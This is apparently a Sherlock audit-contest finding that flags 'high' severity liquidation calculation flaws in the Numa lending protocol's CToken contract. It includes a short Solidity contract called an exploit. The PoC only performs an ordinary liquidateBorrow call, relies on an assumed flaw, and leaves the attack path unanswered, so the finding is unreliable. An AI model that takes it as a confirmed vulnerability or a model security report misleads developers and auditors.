Bouncy Cloud Mockingbird - Liquidation Calculation Vulnerabilities

[sherlock-admin3]

Bouncy Cloud Mockingbird

High

Liquidation Calculation Vulnerabilities

Summary

Liquidation logic relies on external Comptroller calculations but lacks proper checks for edge cases like insufficient collateral or incorrect seize token amounts.

Root Cause

In https://github.com/sherlock-audit/2024-12-numa-audit/blob/ae1d7781efb4cb2c3a40c642887ddadeecabb97d/Numa/contracts/lending/CToken.sol#L1021
The liquidation logic relies on external Comptroller calculations but lacks proper checks for edge cases like insufficient collateral or incorrect seize token amounts.

Internal pre-conditions

No response

External pre-conditions

No response

Attack Path

No response

Impact

An attacker could manipulate collateral calculations or leverage edge cases to bypass liquidation checks, leading to incorrect token seizures.

PoC

contract LiquidationExploit {
CToken public targetCToken;
CToken public collateralToken;

constructor(address _targetCToken, address _collateralToken) {
    targetCToken = CToken(_targetCToken);
    collateralToken = CToken(_collateralToken);
}

function exploitLiquidation(address borrower, uint256 repayAmount) external {
    // Step 1: Exploit the collateral calculation logic.
    // Assume the contract doesn't correctly check seizeTokens.

    // Step 2: Initiate a liquidation with minimal repayAmount.
    targetCToken.liquidateBorrow(borrower, repayAmount, collateralToken);

    // Step 3: The attacker seizes more tokens than allowed due to miscalculation.
    // Transfer seized tokens to attacker.
    uint256 seizedTokens = collateralToken.balanceOf(address(this));
    collateralToken.transfer(msg.sender, seizedTokens);
}

}

Mitigation

Perform additional internal collateral validations before executing seizures.